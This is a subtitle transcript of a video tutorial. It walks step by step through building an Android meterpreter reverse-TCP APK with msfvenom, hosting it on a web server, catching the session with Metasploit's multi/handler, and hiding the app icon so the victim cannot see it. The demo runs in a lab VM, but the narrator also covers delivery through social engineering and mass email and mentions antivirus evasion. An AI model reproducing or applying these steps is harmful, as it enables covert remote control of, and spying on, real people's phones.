1
00:00:15,360 --> 00:00:18,540
Hi and welcome back to our members only exclusive video.
2
00:00:19,170 --> 00:00:23,910
So today we're discussing a very simple trick on how you could actually hide the mobile application,
3
00:00:23,910 --> 00:00:25,290
through Metasploit framework.
4
00:00:25,620 --> 00:00:31,620
So we will create a file and once we have created a picture file or install it to a delivery mechanism
5
00:00:31,620 --> 00:00:37,200
from a Web application server into the mobile device, and from there we'll actually issue a command
6
00:00:37,200 --> 00:00:40,650
to actually hide the mobile app from the user.
7
00:00:40,830 --> 00:00:46,200
And the only way to see that will be to look into the settings of the applications and see what are
8
00:00:46,200 --> 00:00:51,060
some of the running services or running apps that are inside the mobile device.
9
00:00:51,570 --> 00:00:54,640
So without further ado, let us get started on today's tutorial.
10
00:00:55,110 --> 00:00:59,890
So on the left of the screen I have Kali Linux running and we can actually go into terminal and once again
11
00:00:59,940 --> 00:01:03,480
terminal, we can zoom in a little and we can enter ip addr.
12
00:01:04,260 --> 00:01:09,160
So with this we can actually see the IP address of 192.168.1.11.
13
00:01:09,180 --> 00:01:11,680
So this is the IP address of the attacker server.
14
00:01:11,700 --> 00:01:17,160
So this is also the server where we'll be hosting the listening services coming from Metasploit.
15
00:01:17,850 --> 00:01:21,800
And of course, on the right side of the screen, I actually have an Android mobile device running.
16
00:01:21,810 --> 00:01:25,440
So this is running on the Oracle VirtualBox.
17
00:01:25,440 --> 00:01:26,640
So this is an android.
18
00:01:26,640 --> 00:01:27,660
It is running over here.
19
00:01:27,660 --> 00:01:33,330
And of course, we were able to surf into the net and we can actually open up browsers and we can actually
20
00:01:33,330 --> 00:01:39,020
go into the Internet and be able to search up on information, say, for example, enter LILIANNA and
21
00:01:39,060 --> 00:01:41,600
we can see the website, a YouTube channel and so on.
22
00:01:41,610 --> 00:01:43,930
So there is Internet connection.
23
00:01:44,760 --> 00:01:51,300
So moving back into Kali Linux, we actually have to use msfvenom so you can actually enter msfvenom.
24
00:01:51,300 --> 00:01:54,090
Then of course, we would tell you all the parameters and options.
25
00:01:54,570 --> 00:01:59,430
And it's really important, especially when you're learning about cyber security, to try all the tools,
26
00:01:59,430 --> 00:02:04,620
try all the different parameters and options like the changes in a NOP sled, for example, over here
27
00:02:04,620 --> 00:02:06,810
that you can see on the length of the sled.
28
00:02:07,170 --> 00:02:11,550
And again, all these are actually being used to help you bypass a lot of these security mechanisms
29
00:02:11,910 --> 00:02:13,970
coming from the antivirus servers and so on.
30
00:02:13,980 --> 00:02:19,170
So really important way for you to really think about cybersecurity in a more advanced level.
31
00:02:19,620 --> 00:02:26,220
And a lot of the advanced level actually requires a lot of trying out tests and aerials, especially
32
00:02:26,220 --> 00:02:30,960
on the fly, trying to find out new ways of bypassing many of these security fences.
33
00:02:31,830 --> 00:02:34,920
So, of course, moving forward, what we'll do is we actually enter msfvenom.
34
00:02:35,610 --> 00:02:41,530
And we actually ended up followed by android meterpreter, followed by reverse underscore TCP.
35
00:02:41,550 --> 00:02:46,130
So this would be a reverse shell into the Kali Linux listening server.
36
00:02:46,380 --> 00:02:51,140
And of course we can go into LHOST equal 192.168.1.11.
37
00:02:51,150 --> 00:02:57,640
So this is the listening server IP address to be using for mobile port so we can say nine nine nine
38
00:02:57,650 --> 00:03:05,580
nine and of course we can also do a R and we have output to file into, say, for example, that we
39
00:03:05,580 --> 00:03:11,910
can actually put it in and call a mobile app dot apk and hit enter on that.
40
00:03:11,940 --> 00:03:13,460
So this would generate a file.
41
00:03:13,470 --> 00:03:18,330
So as you can see on the left side, the file is being generated by msfvenom.
42
00:03:18,340 --> 00:03:23,320
So once you have the file you have to service it and release it over into the mobile application.
43
00:03:23,320 --> 00:03:30,600
And a lot of times a lot of these payloads are actually being really using Web application servers,
44
00:03:30,600 --> 00:03:34,620
using social engineering attacks, using malicious emails and so on.
45
00:03:35,070 --> 00:03:41,370
So a lot of times all these payloads and deliveries are actually used using social engineering to mass
46
00:03:41,370 --> 00:03:43,170
email sending and so on.
47
00:03:43,440 --> 00:03:49,050
So usually that's the case in a lot of the attacks that are happening in the industry and in fact in
48
00:03:49,050 --> 00:03:49,740
the industry.
49
00:03:50,070 --> 00:03:55,410
Most of the time, 99 percent of the time, the attacks are going after vulnerabilities that are really
50
00:03:55,410 --> 00:03:59,910
being available for the past many years instead of the zero day attacks.
51
00:03:59,910 --> 00:04:06,000
And of course, zero day attacks are highly novel, but a generation and a creation of zero day vulnerabilities
52
00:04:06,000 --> 00:04:07,890
and exploits are very challenging.
53
00:04:08,760 --> 00:04:11,110
So anyway, moving forward.
54
00:04:11,160 --> 00:04:14,790
So what we'll do is we can actually go ahead and go into msfconsole.
55
00:04:14,800 --> 00:04:16,830
So this would start up the Metasploit framework.
56
00:04:17,890 --> 00:04:23,680
And once we are in the Metasploit framework, what we'll do is we have to start up the server.
57
00:04:23,680 --> 00:04:28,870
So, of course, once we start up the server, this is the part where we will actually host the listening
58
00:04:28,870 --> 00:04:29,320
server.
59
00:04:29,320 --> 00:04:33,400
And once we host the listening server, we'll be able to get ready for any connections coming in.
60
00:04:34,390 --> 00:04:41,200
And what we can do is we can actually enter use exploit multi handler.
61
00:04:42,010 --> 00:04:48,010
So once you do that, all you got to do is move forward and look at show options so you can see what
62
00:04:48,010 --> 00:04:49,300
are the options available.
63
00:04:49,840 --> 00:04:53,350
So you can also specify the kind of payload that we'll be using in this case.
64
00:04:53,350 --> 00:05:01,810
So we can actually go ahead and say that we'll be using the payload so we can enter set payload as Android
65
00:05:01,930 --> 00:05:09,880
meterpreter, reverse underscore TCP and we can show options and we have to set the LHOST as
66
00:05:09,970 --> 00:05:11,740
192.168.1.11.
67
00:05:11,770 --> 00:05:19,090
So this is the Kali Linux IP address and once you have all this information being set up, you can actually
68
00:05:19,090 --> 00:05:20,150
go and enter exploit.
69
00:05:20,860 --> 00:05:26,260
So this would actually start hosting the server so we can open a terminal again.
70
00:05:27,070 --> 00:05:32,620
So now what we got to do is transfer the file that we've created over here near mobile app APK and we
71
00:05:32,620 --> 00:05:35,020
get to transfer it into the mobile application.
72
00:05:35,590 --> 00:05:40,030
So, of course, one of the easiest ways is actually start up your own Web application server or you can post
73
00:05:40,030 --> 00:05:43,480
it on like Google Cloud, Microsoft OneDrive and so on.
74
00:05:43,510 --> 00:05:49,360
So those are other ways of actually sharing those malicious payloads over the Internet.
75
00:05:49,510 --> 00:05:53,770
So these are what hackers are doing right now, because there are a lot of ways that you can actually
76
00:05:53,770 --> 00:05:54,640
do the delivery of it.
77
00:05:55,360 --> 00:06:02,770
So what we do is go into etc init.d followed by apache and of course we get apache2 and we
78
00:06:02,770 --> 00:06:06,970
can enter start, make sure the service is started and of course, we'll be prompted for the password
79
00:06:07,210 --> 00:06:10,030
of the demonstrators to go ahead and keep that in mind.
80
00:06:10,120 --> 00:06:12,250
So now we have the Web application server running.
81
00:06:12,250 --> 00:06:18,890
We can actually move the file over so we can enter move mobile app to var html.
82
00:06:19,510 --> 00:06:22,610
So this would actually move the file, so we got to do so.
83
00:06:22,930 --> 00:06:26,770
So super user or sudo.
84
00:06:30,070 --> 00:06:34,380
So of course we got to keep the password for the user that is currently login as an administrator.
85
00:06:34,870 --> 00:06:40,870
So this would move the file so we can see the Davoren of the demo enter Shell so we can see that we
86
00:06:40,880 --> 00:06:44,890
got the mobile app apk that's been created and is being hosted.
87
00:06:45,340 --> 00:06:51,760
So with that in mind, can actually go into the we can actually go into the mobile application that
88
00:06:51,760 --> 00:06:52,540
we have over here.
89
00:06:55,030 --> 00:07:00,970
So we've got to go into the link and from the link, we can actually enter 192.168.1.11
90
00:07:01,150 --> 00:07:05,770
followed by mobile app dot apk, hit enter.
91
00:07:05,770 --> 00:07:07,300
And that that was started.
92
00:07:07,840 --> 00:07:11,020
And once the download completes, we can actually open up the APK file.
93
00:07:11,620 --> 00:07:14,320
And of course over here we have the following.
94
00:07:14,320 --> 00:07:17,160
Download it so we can go ahead and open it up.
95
00:07:17,740 --> 00:07:21,850
So of course a lot of times you can actually disguise and do a lot of changes to the APK file that
96
00:07:21,850 --> 00:07:27,880
we discuss later on on other tutorials, how you can actually embed a payload or you can change some
97
00:07:27,880 --> 00:07:34,420
of the settings and configuration so that it masks its identity, masks its intention as part of the
98
00:07:34,420 --> 00:07:36,250
installation into the mobile device.
99
00:07:37,900 --> 00:07:40,510
So once we have all this information, go ahead and click install.
100
00:07:40,810 --> 00:07:46,340
And of course, it would install the main activity into your mobile application.
101
00:07:46,360 --> 00:07:49,210
So, again, the mobile application can be any Android devices.
102
00:07:49,480 --> 00:07:55,330
And if we have the opportunity, we also discuss about some of the Iaw that we have a vulnerability
103
00:07:55,330 --> 00:07:57,660
on and how we can install all those applications.
104
00:07:57,700 --> 00:07:57,900
I do.
105
00:07:57,910 --> 00:07:59,830
I was so glad I hit open on that.
106
00:08:00,580 --> 00:08:05,950
And of course, once you hit open on that, going back into Kali Linux, we can actually see that we can
107
00:08:05,950 --> 00:08:08,110
go back into the mobile app.
108
00:08:08,620 --> 00:08:11,290
And over here we can see the main activity that's been created.
109
00:08:11,890 --> 00:08:13,270
So we can go in and click on that.
110
00:08:34,100 --> 00:08:40,250
So we set it incorrectly, so we have to set LPORT correctly, so set it as nine nine nine nine, hit
111
00:08:40,250 --> 00:08:42,320
enter and then go ahead and exploit.
112
00:08:43,070 --> 00:08:47,510
So we have the meterpreter session opened up now because it's opened up on the mobile application.
113
00:08:48,050 --> 00:08:52,970
So, of course, once we have the information, we can enter sysinfo so we can actually see the computer,
114
00:08:52,970 --> 00:08:54,680
the operating system type and so on.
115
00:08:55,160 --> 00:08:58,220
So one really cool trick is actually to look at main activity.
116
00:08:58,220 --> 00:09:02,990
So over here on the mobile device, we can see main activity and all you got to do is actually enter
117
00:09:02,990 --> 00:09:05,240
hide app underscore icon.
118
00:09:05,510 --> 00:09:11,300
And once you do that, the activity would actually try to hide the mobile application from appearing
119
00:09:11,900 --> 00:09:12,980
on your catalog.
120
00:09:13,130 --> 00:09:18,350
So over here, what happens is that when we go back here, we can actually see the mobile app being
121
00:09:18,350 --> 00:09:18,880
hidden.
122
00:09:19,460 --> 00:09:24,500
And what happened is that you can actually go under settings and once you're in settings, you can go
123
00:09:24,500 --> 00:09:30,190
on for applications or apps, and then you will be able to see the apps that are running in your environment.
124
00:09:30,500 --> 00:09:34,540
And of course, if you look at running services, we can see main activity running.
125
00:09:34,940 --> 00:09:39,410
So of course, this is the only way the user could detect that the mobile application is running.
126
00:09:40,010 --> 00:09:45,410
So in subsequent members only tutorial, we'll be looking at how you could actually configure the APK
127
00:09:45,410 --> 00:09:52,280
file, change the app icon, change the title postscripts directly alongside installation of the mobile
128
00:09:52,280 --> 00:09:55,400
application and do a lot of automation on top of that.
129
00:09:55,910 --> 00:09:58,760
So, again, I hope you've learned something valuable in today's tutorial.
130
00:09:58,760 --> 00:10:02,630
If you have any questions, feel free to leave a comment below and I'll try my best to answer any of
131
00:10:02,630 --> 00:10:03,260
those questions.
132
00:10:03,440 --> 00:10:05,090
And thank you so much once again for watching.